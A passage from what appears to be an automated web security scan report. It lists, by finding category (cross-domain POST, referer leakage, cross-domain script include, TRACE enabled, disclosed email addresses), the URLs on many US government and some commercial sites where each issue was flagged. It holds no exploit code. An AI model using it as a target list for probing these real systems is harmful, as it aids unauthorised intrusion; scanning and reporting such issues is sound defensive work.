16.5. http://www.archives.gov/includes/javascript/DD_roundies_0.0.2a-min.js

16.6. http://www.dot.state.tx.us/txdoteforms/GetForm

16.7. https://www.humanservices.state.pa.us/Compass.Web/CMHOM.aspx

16.8. https://www.humanservices.state.pa.us/Compass.Web/CPACM.aspx

16.9. https://www.humanservices.state.pa.us/Compass.Web/MenuItems/CompassHelpTool.aspx

16.10. https://www.humanservices.state.pa.us/Compass.Web/MenuItems/LearnAboutCompass.aspx

16.11. https://www.humanservices.state.pa.us/Compass.Web/MenuItems/OtherLanguage.aspx

16.12. https://www.humanservices.state.pa.us/Compass.Web/MenuItems/SeeAllBenefits.aspx

16.13. https://www.humanservices.state.pa.us/Compass.Web/MenuItems/SystemCompatibility.aspx

16.14. https://www.humanservices.state.pa.us/compass.web/MenuItems/ContactUs.aspx

16.15. https://www.humanservices.state.pa.us/compass.web/MenuItems/GeneralInfoFaq.aspx

16.16. https://www.humanservices.state.pa.us/compass.web/MenuItems/SiteMapAfs.aspx

16.17. https://www.humanservices.state.pa.us/compass.web/MenuItems/help.aspx

16.18. https://www.humanservices.state.pa.us/compass.web/Menuitems/ADACompliance.aspx

16.19. https://www.humanservices.state.pa.us/compass.web/Menuitems/BrowserCompat.aspx

16.20. https://www.humanservices.state.pa.us/compass.web/Menuitems/Confidential.aspx

16.21. http://www.nccourts.org/Common/JScript/Common.js

16.22. http://www.portal.state.pa.us/imageserver/plumtree/common/private/js/jsxml/LATEST/PTXML.js

16.23. http://www.txdot.gov/txdoteforms/GetForm

16.24. http://www.utah.gov/js/DD_roundies_0.0.2a-min.js

17. Referer-dependent response

17.1. http://ads.adbrite.com/adserver/vdi/711384

17.2. http://api.twitter.com/1/statuses/user_timeline/okgov.json

17.3. http://emergency.louisiana.gov/ga.js

17.4. http://twitter.com/statuses/user_timeline/IDAHOgov.json

17.5. http://www.facebook.com/plugins/like.php

17.6. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm

18. Cross-domain POST

18.1. http://johncarney.house.gov/

18.2. http://mi.gov/business

18.3. http://milottery.state.mi.us/msl-og-detail.php

18.4. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/chat.php

18.5. http://pa.gov/portal/server.pt

18.6. http://pa.gov/portal/server.pt/community/pa_gov/2966

18.7. http://www.buzgate.org/8.0/ny/fh.html

18.8. http://www.buzgate.org/8.0/ny/fh.html

18.9. http://www.doleta.gov/disability/new_dpn_grants.cfm

18.10. http://www.nist.gov/search-results.cfm

18.11. http://www.nist.gov/srd/onlinelist.htm

18.12. http://www.vsea.org/

18.13. http://www.vsea.org/editorial-lays-out-vermont%26%23039

18.14. http://www.vsea.org/favicon.ico

18.15. http://www.vsea.org/join-vsea

18.16. http://www.vsea.org/join-your-union

18.17. http://www.vsea.org/maine-study-finds-state%26%23039

18.18. http://www.vsea.org/node

18.19. http://www.vsea.org/purchase-vsea-clothing

18.20. http://www.vsea.org/state-hospital%26%23039

18.21. http://www.vsea.org/user/password

18.22. http://www.vsea.org/user/register

19. Cross-domain Referer leakage

19.1. http://cdn.livestream.com/embedfiles/embed-min.js

19.2. http://cm.g.doubleclick.net/pixel

19.3. http://data.ok.gov/packages/shared-map.js

19.4. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libdatalinks.show

19.5. http://fls.doubleclick.net/activityi

19.6. http://ga.gov/00/home/0,2061,4802,00.html

19.7. http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp

19.8. http://googleads.g.doubleclick.net/pagead/ads

19.9. http://googleads.g.doubleclick.net/pagead/ads

19.10. http://googleads.g.doubleclick.net/pagead/ads

19.11. http://home.mcafee.com/Default.aspx

19.12. http://home.mcafee.com/Root/AboutUs.aspx

19.13. http://home.mcafee.com/root/dynamicpage.aspx

19.14. http://image.providesupport.com/js/hic/safe-standard.js

19.15. http://image.providesupport.com/js/hic/safe-standard.js

19.16. http://io9.com/assets/base.v9/js/readability.js

19.17. http://kentucky.gov/feedback.aspx

19.18. http://landmark-project.com/feed2js/feed2js.php

19.19. http://legis.delaware.gov/Legislature.nsf/Lookup/House_Home

19.20. http://legis.delaware.gov/legislature.nsf/Lookup/Divisions_Home

19.21. http://myflorida.custhelp.com/cgi-bin/myflorida.cfg/php/enduser/acct_login.php

19.22. http://myflorida.custhelp.com/cgi-bin/myflorida.cfg/php/enduser/std_alp.php

19.23. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php

19.24. http://pa.gov/portal/server.pt

19.25. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm

19.26. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm

19.27. http://www.adfg.alaska.gov/index.cfm

19.28. http://www.alabama.gov/portal/secondary.jsp

19.29. http://www.alabama.gov/portal/secondary.jsp

19.30. http://www.coloradochannel.net/sites/all/modules/browser_update_popup/js/browser_update_popup.js

19.31. http://www.coloradochannel.net/sites/all/modules/lightbox2/js/lightbox_video.js

19.32. http://www.ct.gov/ctportal/cwp/view.asp

19.33. http://www.dhh.louisiana.gov/offices/page.asp

19.34. http://www.facebook.com/plugins/like.php

19.35. http://www.georgia.gov/external/

19.36. http://www.google.com/search

19.37. http://www.google.com/url

19.38. http://www.in.gov/dwd/WorkOne//

19.39. http://www.leg.state.co.us/clics/clics2011a/cslFrontPages.nsf/Audio

19.40. https://www.mcafeesecure.com/RatingVerify

19.41. http://www.missingkids.com/missingkids/servlet/PageServlet

19.42. http://www.missingkids.com/missingkids/servlet/PageServlet

19.43. http://www.ms.gov/ms_sub_template.jsp

19.44. http://www.nccourts.org/Citizens/GoToCourt/Default.asp

19.45. http://www.nhfishandgame.com/cgi-bin/gl/outdoor.cgi

19.46. http://www.nist.gov/search-results.cfm

19.47. https://www.nrsservicecenter.com/iApp/ret/content/landing.do

19.48. http://www.nv.gov/NV_default4.aspx

19.49. http://www.nysegov.com/citGuide.cfm

19.50. http://www.nysegov.com/citguide.cfm

19.51. https://www.paybill.com/Common/Left.asp

19.52. https://www.scsignon.sc.gov/

19.53. http://www.state.mn.us/portal/mn/jsp/home.do

19.54. https://www.tennesseeanytime.org/pmnout/notice/listByMonth

19.55. http://www.texas.gov/en/search/Pages/results.aspx

19.56. http://www.vsea.org/purchase-vsea-clothing

20. Cross-domain script include

20.1. https://apps.tn.gov/bizreg/

20.2. https://apps.tn.gov/biztax/

20.3. http://az.gov/

20.4. http://az.gov/services_tourism.html

20.5. http://blog.nheconomy.com/

20.6. http://cityofmuscleshoals.com/Default.asp

20.7. http://climate.rutgers.edu/njwxnet/station.php

20.8. http://courts.delaware.gov/Help/fcrecordaccess.stm

20.9. http://data.ok.gov/

20.10. http://data.ok.gov/browse

20.11. http://de.gov/profile.php

20.12. http://de.gov/topics/yourgovernment

20.13. http://digg.com/submit

20.14. http://dola.colorado.gov/dem/index.html

20.15. http://emergency.louisiana.gov/

20.16. http://finance.yahoo.com/q

20.17. http://fls.doubleclick.net/activityi

20.18. http://ga.gov/00/channel_createdate/0,2095,4802_49268007,00.html

20.19. http://ga.gov/00/channel_title/0,2094,4802_13167990,00.html

20.20. http://ga.gov/00/channel_title/0,2094,4802_4965,00.html

20.21. http://ga.gov/00/channel_title/0,2094,4802_4969,00.html

20.22. http://ga.gov/00/channel_title/0,2094,4802_5035,00.html

20.23. http://ga.gov/00/home/0,2061,4802,00.html

20.24. http://ga.gov/00/mobile/0,2783,4802,00.html

20.25. http://googleads.g.doubleclick.net/pagead/ads

20.26. http://googleads.g.doubleclick.net/pagead/ads

20.27. http://gov.louisiana.gov/index.cfm

20.28. http://groups.google.com/grphp

20.29. http://home.mcafee.com/AdviceCenter/Default.aspx

20.30. https://home.mcafee.com/Secure/Protected/Login.aspx

20.31. http://ia.gov/livehelp.html

20.32. http://idaho.gov/

20.33. http://idaho.gov/public/portal/contact.html

20.34. http://idaho.gov/search.html

20.35. http://in.gov/

20.36. http://in.gov/core/agriculture.html

20.37. http://in.gov/core/business.html

20.38. http://in.gov/core/index_pages/void()

20.39. http://in.gov/core/js/arss.css

20.40. http://in.gov/core/online_services.html

20.41. http://in.gov/gov/photo.htm

20.42. http://in.gov/sos/securities/2521.htm

20.43. http://in.gov/spd/2333.htm

20.44. http://in.gov/void()

20.45. http://itunes.apple.com/app/eyes-and-ears-on-kentucky/id422703420

20.46. http://itunes.apple.com/us/app/indiana-dnr/id395591679

20.47. http://itunes.apple.com/us/app/netflix/id363590051

20.48. http://itunes.apple.com/us/app/ri-gov/id374968524

20.49. http://johncarney.house.gov/press-release/rep-carney-statement-budget-agreement

20.50. http://jquery.com/

20.51. http://jqueryui.com/themeroller/

20.52. http://kentucky.gov/Pages/home.aspx

20.53. http://kentucky.gov/feedback.aspx

20.54. http://la.gov/includes/banner/emergencybanner.js

20.55. http://licensingexpress.wordpress.com/

20.56. http://mi.gov/

20.57. http://obm.ohio.gov/document.aspx

20.58. http://oh.gov/

20.59. http://ok.gov/

20.60. http://oregon.gov/

20.61. http://pa.gov/portal/server.pt

20.62. http://pa.gov/portal/server.pt/community/pa_gov/2966

20.63. http://sc.gov/Pages/default.aspx

20.64. https://secure.kentucky.gov/portal/login.aspx

20.65. https://secure.missingkids.com/missingkids/servlet/CybertipServlet

20.66. https://securetransactions.mva.maryland.gov/emvastore/MainMenu.aspx

20.67. http://tn.gov/

20.68. https://txapps.texas.gov/tolapp/txdl/welcome.dl

20.69. https://unitedalert.com/

20.70. http://www.511ia.org/default.asp

20.71. http://www.addthis.com/bookmark.php

20.72. http://www.agriculture.state.tn.us/Marketing.asp

20.73. http://www.alabama.gov/portal/index.jsp

20.74. http://www.alabama.gov/portal/secondary.jsp

20.75. http://www.amberalert.com/en/alerts/state/

20.76. http://www.archives.gov/shop/

20.77. http://www.archives.gov/veterans/evetrecs/index.html

20.78. http://www.archives.gov/veterans/military-service-records/

20.79. http://www.buzgate.org/8.0/ny/fh.html

20.80. http://www.capehenlopenschools.com/education/district/district.php

20.81. http://www.centerdigitalgov.com/center/highlightstory.phtml

20.82. http://www.colorado.gov/

20.83. http://www.cotrip.org/device.htm

20.84. http://www.dds.ga.gov/drivers/DLdata.aspx

20.85. http://www.delmar.k12.de.us/education/district/district.php

20.86. http://www.denvergov.org/tabid/37889/Default.aspx

20.87. http://www.dol.wa.gov/onlinesvcs.html

20.88. http://www.dol.wa.gov/vehicleregistration/

20.89. http://www.dyve.net/jquery/

20.90. http://www.ed.gov/rschstat/landing.jhtml

20.91. http://www.ehawaii.gov/dakine/index.html

20.92. http://www.employment.oregon.gov/EMPLOY/ES/JOB/index.shtml

20.93. http://www.employment.oregon.gov/EMPLOY/STORIES/online_filing_success.shtml

20.94. http://www.employment.oregon.gov/images/doesNotExist.png

20.95. http://www.facebook.com/TeamHaslam

20.96. http://www.facebook.com/WSDOL

20.97. http://www.facebook.com/note.php

20.98. http://www.facebook.com/ohiodivisionofwatercraft

20.99. http://www.facebook.com/photo.php

20.100. http://www.facebook.com/plugins/like.php

20.101. http://www.facebook.com/share.php

20.102. http://www.georgia.gov/external/

20.103. http://www.georgia.gov/gta/translate/0,2678,4802,00.html

20.104. http://www.georgiawildlife.com/node/1873

20.105. http://www.goccp.maryland.gov/lists/index.php

20.106. http://www.gov.state.la.us/index.cfm

20.107. http://www.in.gov/ai/errors/dwd_404.html

20.108. http://www.in.gov/apps/options/email.aspx

20.109. http://www.in.gov/apps/options/rate.aspx

20.110. http://www.in.gov/apps/options/suggestion.aspx

20.111. http://www.in.gov/core/faqs.html

20.112. http://www.in.gov/dhs/3163.htm

20.113. http://www.in.gov/dnr/6406.htm

20.114. http://www.in.gov/dwd/WorkOne//

20.115. http://www.in.gov/idem/hoosierscare/5601.htm

20.116. http://www.in.gov/isda/2435.htm

20.117. http://www.in.gov/oed/2367.htm

20.118. http://www.in.gov/oed/2572.htm

20.119. http://www.in.gov/pla/license.htm

20.120. http://www.in.gov/recycle/5636.htm

20.121. http://www.inshapeindiana.org/

20.122. http://www.iowa.gov/livehelp.html

20.123. http://www.kansas.gov/index.php

20.124. http://www.kansas.gov/search.php

20.125. http://www.kansas.gov/services/

20.126. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp

20.127. http://www.ksde.org/Default.aspx

20.128. https://www.mcafeesecure.com/RatingVerify

20.129. http://www.mcgi.state.mi.us/milocator/default.aspx

20.130. http://www.mema.state.md.us/MEMA/content_page.jsp

20.131. http://www.michigan.org/Partners/Default.aspx

20.132. http://www.missingkids.com/missingkids/servlet/NewsEventServlet

20.133. http://www.missingkids.com/missingkids/servlet/PageServlet

20.134. http://www.missingkids.com/missingkids/servlet/PubCaseSearchServlet

20.135. http://www.missingkids.com/missingkids/servlet/PublicHomeServlet

20.136. http://www.missingkids.com/missingkids/servlet/StayInformedServlet

20.137. http://www.mo.gov/my-government/transparency-accountability/meetings/details.php

20.138. http://www.molottery.com/winningNumbers.do

20.139. http://www.money-rates.com/news/10-best-states-for-making-a-living.htm

20.140. http://www.myflorida.com/

20.141. http://www.nh.gov/maps/traffic/index.html

20.142. http://www.nhfishandgame.com/cgi-bin/gl/outdoor.cgi

20.143. http://www.nist.gov/srd/onlinelist.htm

20.144. https://www.nrsservicecenter.com/iApp/ret/cmd/RetLogin

20.145. https://www.nrsservicecenter.com/iApp/ret/content/landing.do

20.146. https://www.nrsservicecenter.com/iApp/ret/landing.do

20.147. https://www.nrsservicecenter.com/iApp/ret/showPage.do

20.148. http://www.nysenate.gov/

20.149. http://www.nysenate.gov/calendar

20.150. http://www.odh.ohio.gov/forms/formfinder.aspx

20.151. http://www.opensource.org/licenses/mit-license.php

20.152. http://www.osc.state.ny.us/

20.153. https://www.paybill.com/Common/Left.asp

20.154. http://www.qualityinfo.org/olmisj/OlmisZine

20.155. http://www.real.com/realplayer

20.156. https://www.scsignon.sc.gov/

20.157. https://www.scsignon.sc.gov/Common/HelpWindow.aspx

20.158. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotPassword.aspx

20.159. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotUserName.aspx

20.160. https://www.scsignon.sc.gov/Login.aspx

20.161. https://www.scsignon.sc.gov/WebResource.axd

20.162. https://www.scsignon.sc.gov/eng/Secured/Security/CreateUserName.aspx

20.163. http://www.servicelocator.org/

20.164. http://www.sha.maryland.gov/Index.aspx

20.165. http://www.state.mn.us/portal/mn/jsp/home.do

20.166. http://www.state.nj.us/education/

20.167. http://www.state.nj.us/education/parents/

20.168. https://www.tennesseeanytime.org/biztax/

20.169. https://www.tennesseeanytime.org/paams-app/index.htm

20.170. https://www.tennesseeanytime.org/pmnout/notice/listByMonth

20.171. http://www.thestreet.com/story/11081894/1/netflixs-rising-stock-defies-growing-risks.html

20.172. http://www.tn.gov/bopp/bopp_bo_contents.htm

20.173. http://www.tn.gov/governor/

20.174. http://www.tn.gov/maintenance.html

20.175. http://www.tn.gov/revenue/forms/index.htm

20.176. http://www.tn.gov/revenue/onlinefiling/

20.177. http://www.tn.gov/revenue/onlinefiling/businesstax/biztaxonlinefiling.htm

20.178. http://www.tn.gov/revenue/onlinefiling/businesstax/biztaxregister.htm

20.179. http://www.tn.gov/revenue/onlinefiling/businesstax/bustaxefile.htm

20.180. http://www.tn.gov/revenue/onlinefiling/onlineregister.htm

20.181. http://www.tn.gov/revenue/onlinefiling/salesanduse/electronicfiling.htm

20.182. http://www.tn.gov/revenue/onlinefiling/salesanduse/salestaxefile.htm

20.183. http://www.ulsystem.net/index.cfm

20.184. http://www.utah.gov/governor/news_media/article.html

20.185. http://www.utah.gov/index.html

20.186. http://www.utah.gov/pmn/sitemap/notice/67945.html

20.187. http://www.utah.gov/services/

20.188. http://www.utah.gov/services/business.html

20.189. http://www.utah.gov/services/financial.html

20.190. http://www.utah.gov/services/index.html

20.191. http://www.utah.gov/whatsnew.html

20.192. http://www.visitflorida.com/facebook_logged_in.php

20.193. http://www.visitflorida.com/florida_vacation_auction/auction_details.php

20.194. http://www.visitflorida.com/floridalive

20.195. http://www.vtlmi.info/

20.196. http://www.wor710.com/topic/play_window.php

21. TRACE method is enabled

21.1. http://services.ito.state.il.us/

21.2. http://www.vsea.org/

22. Email addresses disclosed

22.1. http://admin.state.nh.us/hr/js/HM_ScriptDOM.js

22.2. http://admin.state.nh.us/hr/retirement_benefits.html

22.3. http://admin.state.nh.us/wellness/scripts/textsizer.js

22.4. http://ads.adbrite.com/adserver/vdi/711384

22.5. http://agency.governmentjobs.com/tennessee/default.cfm

22.6. http://alaska.gov/

22.7. http://alaska.gov/quote.html

22.8. http://amix.dk/

22.9. http://api.flickr.com/services/feeds/photoset.gne

22.10. https://apps.tn.gov/apps/js/calendar1.js

22.11. https://apps.tn.gov/apps/js/controls.js

22.12. https://apps.tn.gov/apps/js/dragdrop.js

22.13. http://assembly.state.ny.us/

22.14. http://assembly.state.ny.us/leg/

22.15. http://assembly.state.ny.us/mem/

22.16. https://assist.dhss.delaware.gov/PGM/ASP/SACOM.asp

22.17. http://az.gov/static/portal/js/CalendarPopup.js

22.18. http://blog.nheconomy.com/

22.19. http://ca.gov/images/home/golden_gateway.f4v

22.20. http://cache.pack.google.com/edgedl/chrome/install/696.60_648.205/chrome_updater.exe

22.21. http://cdnb1.kodakgallery.com/A/consolidatedFiles/common_consolidated.min.v-2028399759.js

22.22. http://cityofmuscleshoals.com/Default.asp

22.23. http://climate.rutgers.edu/njwxnet/station.php

22.24. http://courts.delaware.gov/

22.25. http://data.osbm.state.nc.us/pls/pbis/dyn_hr_staffweb.show

22.26. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libdatalinks.show

22.27. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libevents.show

22.28. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libforms.show

22.29. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libmemos.show

22.30. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libnews.show

22.31. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libother_one.show

22.32. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libpubs.show

22.33. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libtopicgroups.show

22.34. https://dhr.ky.gov/DHRWeb/RS

22.35. http://dnr.maryland.gov/service/

22.36. http://dola.colorado.gov/dem/index.html

22.37. http://fastcache.gawkerassets.com/assets/base.v10/static/base.v10.widget.20110427.js

22.38. https://fin.oaks.ohio.gov/psp/FNPRD/

22.39. http://ga.gov/gta/mc/includes/omniture/s_code.js

22.40. https://georgiawildlife.dnr.state.ga.us/service/login1.asp

22.41. https://hcm.oaks.ohio.gov/psp/HCPRD/

22.42. http://home.mcafee.com/Root/AboutUs.aspx

22.43. https://home.mcafee.com/Scripts/instant_invite/ProActiveChatSmartButton.js

22.44. http://housing.utah.gov/news/

22.45. http://ia.gov/

22.46. http://ia.gov/js/jq-cookies.js

22.47. http://idaho.gov/appskins/idahogov200902/javascript/equalcolumns.js

22.48. http://in.gov/core/js/agency.js

22.49. http://in.gov/core/js/jquery.slideshow.js

22.50. http://in.gov/core/js/jquery.swapimage.min.js

22.51. http://in.gov/core/js/portal_scripts.js

22.52. https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm

22.53. http://johncarney.house.gov/

22.54. http://johncarney.house.gov/press-release/rep-carney-statement-budget-agreement

22.55. http://johncarney.house.gov/profiles/house/themes/house/js/jquery-validation-engine.js

22.56. http://kentucky.gov/SiteCollectionDocuments/scripts/jquery/cookie/jquery.cookie.js

22.57. http://kentucky.gov/SiteCollectionDocuments/scripts/jquery/fontsizer/jquery.fontsizer.js

22.58. http://kentucky.gov/SiteCollectionDocuments/scripts/jquery/innerfade/jquery.innerfade.js

22.59. http://la.gov/

22.60. http://la.gov/Government/Boards_and_Commissions/

22.61. http://legis.state.la.us/contact.htm

22.62. http://legis.state.la.us/main.asp

22.63. http://licensingexpress.wordpress.com/

22.64. http://maps.google.com/maps/gx

22.65. http://maps.google.com/maps/gx

22.66. http://maps.google.com/maps/gx

22.67. http://maps.google.com/maps/gx

22.68. http://maps.google.com/maps/sf

22.69. http://maps.google.com/maps/sf

22.70. http://maps.google.com/maps/sf

22.71. http://maps.google.com/maps/sf

22.72. http://mi.gov/js/jquery.cross-slide.min.0.6.2.js

22.73. http://mi.gov/js/jquery.cross-slide.min.js

22.74. http://mibid.bidcorp.com/ActiveAuctions.aspx

22.75. http://mibid.bidcorp.com/AuctionDetails.aspx

22.76. http://mibid.bidcorp.com/EndingAuctions.aspx

22.77. https://mibid.bidcorp.com/Login.aspx

22.78. http://nc.gov/1222,1222,Online_Services,Online_Services.html

22.79. http://nc.gov/directory.aspx

22.80. http://ncchildcaresearch.dhhs.state.nc.us/search.asp

22.81. http://newmexico.gov/

22.82. https://nhlicenses.nh.gov/MyLicense%20Enterprise/

22.83. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/license.pl

22.84. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/license.pl

22.85. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/license.pl

22.86. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/training.pl

22.87. https://nhlicenses2.nh.gov/professional/

22.88. http://nv.gov/GovPR.aspx

22.89. http://nv.gov/WorkArea/java/ektron.js

22.90. http://nv.gov/ext/adapter/ext/ext-base.js

22.91. http://nv.gov/ext/ext-all.js

22.92. http://nv.gov/ext/resources/css/ext-all.css

22.93. http://nv.gov/ext/resources/css/xtheme-blue.css

22.94. http://ohiodnr.com/controls/SolpartMenu/spmenu.js

22.95. http://ohiodnr.com/watercraft/BuckeyeBoater/tabid/2200/Default.aspx

22.96. http://ohiodnr.com/watercraft/RegistrationandTitling/tabid/2774/Default.aspx

22.97. http://phonebook.iowa.gov/agency.aspx

22.98. http://phonebook.iowa.gov/info.aspx

22.99. http://phonebook.iowa.gov/js/jq-cookies.js

22.100. http://sc.gov/Style%20Library/scripts/jquery.cookie.js

22.101. http://serverapi.arcgisonline.com/jsapi/arcgis/

22.102. http://sos.ri.gov/business/

22.103. http://sos.ri.gov/business/apostilles/

22.104. http://sos.ri.gov/openmeetings/

22.105. http://stayconnected.hawaii.gov/

22.106. http://tn.gov/

22.107. http://tn.gov/apps/js/controls.js

22.108. http://tn.gov/apps/js/dragdrop.js

22.109. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm

22.110. https://treas-secure.treas.state.mi.us/eservice_enu/19230/scripts/swecommon.js

22.111. https://txapps.texas.gov/tolapp/viewandpay

22.112. http://webapps6.doc.state.nc.us/opi/offenderescapesearch.do

22.113. http://webapps6.doc.state.nc.us/opi/offenderreleasesearch.do

22.114. http://www.511ia.org/default.asp

22.115. http://www.adfg.alaska.gov/index.cfm

22.116. http://www.ag.ny.gov/

22.117. https://www.alabamainteractive.org/abc_license/

22.118. https://www.alabamainteractive.org/arecmenu/welcome.action

22.119. http://www.archives.gov/includes/javascript/DD_roundies_0.0.2a-min.js

22.120. http://www.archives.gov/veterans/military-service-records/

22.121. https://www.bbb.org/online/consumer/cks.aspx

22.122. http://www.bea.gov/bea/regional/reis/default.cfm

22.123. http://www.blogs.va.gov/VAntage/

22.124. http://www.budget.state.pa.us/portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566

22.125. http://www.colorado.gov/apps/epostcard/servlet/begin

22.126. http://www.colorado.gov/apps/feedback/servlet/begin

22.127. http://www.coloradochannel.net/sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js

22.128. http://www.ct.gov/

22.129. http://www.ct.gov/ctportal/cwp/view.asp

22.130. http://www.ct.gov/ctportal/site/default.asp

22.131. http://www.ct.gov/ctportal/taxonomy/taxonomy.asp

22.132. http://www.delmar.k12.de.us/education/district/district.php

22.133. http://www.dhh.louisiana.gov/links.asp

22.134. http://www.dhh.louisiana.gov/offices/page.asp

22.135. http://www.dhss.delaware.gov/dhss/stylesheets/print.css

22.136. http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace

22.137. http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers

22.138. http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers/online_purchasing

22.139. http://www.dms.myflorida.com/design/dev/javascript/jquery.dataTables.js

22.140. http://www.dms.myflorida.com/design/dev/javascript/prototype.js

22.141. http://www.dms.myflorida.com/extension/ezdatetimeselect/design/standard/javascript/calendar.js

22.142. http://www.dms.myflorida.com/extension/ezdatetimeselect/design/standard/javascript/lang/calendar-en.js

22.143. http://www.dms.myflorida.com/mfmp

22.144. http://www.doc.louisiana.gov/view.php

22.145. http://www.doc.state.nc.us/clemency/

22.146. http://www.dol.wa.gov/driverslicense/guide.html

22.147. http://www.doleta.gov/disability/new_dpn_grants.cfm

22.148. http://www.dyve.net/jquery/

22.149. http://www.epa.ohio.gov/Default.aspx

22.150. http://www.georgiawildlife.com/

22.151. http://www.governmentjobs.com//js/wddx.js

22.152. http://www.governor.ny.gov/

22.153. http://www.governor.ny.gov/js/js_6bd6cece2835e62cf45d64d29e58747f.js

22.154. http://www.healthynh.com/inc/menusNeue.phpi

22.155. http://www.healthynh.com/index-fhc.php

22.156. https://www.humanservices.state.pa.us/Compass.Web/CPACM.aspx

22.157. http://www.illinois.gov/PressReleases/PressReleasesSearch.cfm

22.158. http://www.in.gov/dnr/6406.htm

22.159. http://www.in.gov/portal/global/javascript/9.js

22.160. http://www.inshapeindiana.org/

22.161. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp

22.162. http://www.ksde.org/Default.aspx

22.163. http://www.mcgi.state.mi.us/milocator/default.aspx

22.164. http://www.mema.state.md.us/MEMA/content_page.jsp

22.165. http://www.mo.gov/my-government/transparency-accountability/meetings/details.php

22.166. http://www.mo.gov/wp-content/themes/Mo.gov/js/compiled/compiled-js.php

22.167. http://www.nh.gov/accountancy/

22.168. http://www.nh.gov/dot/nhrideshare/

22.169. http://www.nh.gov/scripts/textsizer.js

22.170. http://www.nhfishandgame.com/cgi-bin/gl/outdoor.cgi

22.171. http://www.nist.gov/search-results.cfm

22.172. http://www.nist.gov/srd/onlinelist.htm

22.173. http://www.nmcpr.state.nm.us/nmac/

22.174. http://www.nv.gov/NV_default4.aspx

22.175. http://www.nv.gov/WorkArea/java/ektron.js

22.176. http://www.nv.gov/ext/adapter/ext/ext-base.js

22.177. http://www.nv.gov/ext/ext-all.js

22.178. http://www.nv.gov/ext/resources/css/ext-all.css

22.179. http://www.nv.gov/ext/resources/css/xtheme-blue.css

22.180. http://www.nyfirst.ny.gov/

22.181. http://www.nysenate.gov/files/js/js_62120c49af6ee45b927235f2cfb845ee.js

22.182. http://www.obout.com/t2/ht_howto.aspx

22.183. http://www.ode.state.or.us/search/results/

22.184. http://www.opensource.org/licenses/mit-license.php

22.185. http://www.osbm.state.nc.us/js/helperplugin.js

22.186. http://www.osbm.state.nc.us/ncosbm/facts_and_figures/socioeconomic_data/census_home.shtm

22.187. https://www.paybill.com/payccu/

22.188. http://www.ri.gov/js/fontsizer.js

22.189. http://www.ri.gov/js/jquery.cdc.ticker.js

22.190. http://www.ri.gov/js/jquery_cookie.js

22.191. http://www.ri.gov/plugins/mozilla_search.xml

22.192. http://www.servicelocator.org/

22.193. http://www.sha.maryland.gov/Index.aspx

22.194. http://www.sos.idaho.gov/elect/eleindex.htm

22.195. http://www.sos.idaho.gov/elect/results.htm

22.196. http://www.state.sd.us/calendar/index.cfm

22.197. https://www.tennesseeanytime.org/apps/js/controls.js

22.198. https://www.tennesseeanytime.org/apps/js/dragdrop.js

22.199. https://www.tennesseeanytime.org/apps/js/prototype.lite.js

22.200. https://www.tennesseeanytime.org/biztax/

22.201. https://www.tennesseeanytime.org/pmnout/notice/listByMonth

22.202. http://www.texas.gov/en/Pages/default.aspx

22.203. http://www.tn.gov/apps/js/controls.js

22.204. http://www.tn.gov/apps/js/dragdrop.js

22.205. http://www.tn.gov/bopp/bopp_bo_contents.htm

22.206. http://www.tn.gov/governor/

22.207. http://www.tn.gov/maintenance.html

22.208. http://www.tn.gov/revenue/forms/index.htm

22.209. http://www.tn.gov/revenue/onlinefiling/

22.210. http://www.tn.gov/revenue/onlinefiling/businesstax/biztaxonlinefiling.htm

22.211. http://www.tn.gov/revenue/onlinefiling/businesstax/biztaxregister.htm

22.212. http://www.tn.gov/revenue/onlinefiling/businesstax/bustaxefile.htm

22.213. http://www.tn.gov/revenue/onlinefiling/onlineregister.htm

22.214. http://www.tn.gov/revenue/onlinefiling/salesanduse/electronicfiling.htm

22.215. http://www.tn.gov/revenue/onlinefiling/salesanduse/salestaxefile.htm

22.216. http://www.treasury.louisiana.gov/Home%20Pages/BondCommission.aspx

22.217. http://www.utah.gov/governor/news_media/article.html

22.218. http://www.utah.gov/js/DD_roundies_0.0.2a-min.js

22.219. http://www.utah.gov/js/jquery.scrollable.min.js

22.220. http://www.utah.gov/pmn/sitemap/notice/67945.html

22.221. https://www.vermontjoblink.com/ada

22.222. https://www.vermontjoblink.com/ada/

22.223. https://www.vermontjoblink.com/ada/404/404_qry.cfm

22.224. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm

22.225. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm

22.226. https://www.vermontjoblink.com/ada/customization/Vermont/favicon.ico

22.227. https://www.vermontjoblink.com/ada/customization/Vermont/images/1p.gif

22.228. https://www.vermontjoblink.com/ada/customization/Vermont/images/crop_hump2.jpg

22.229. https://www.vermontjoblink.com/ada/customization/Vermont/images/statebullet.png

22.230. https://www.vermontjoblink.com/ada/customization/Vermont/images/vt_logo.gif

22.231. https://www.vermontjoblink.com/ada/default.cfm

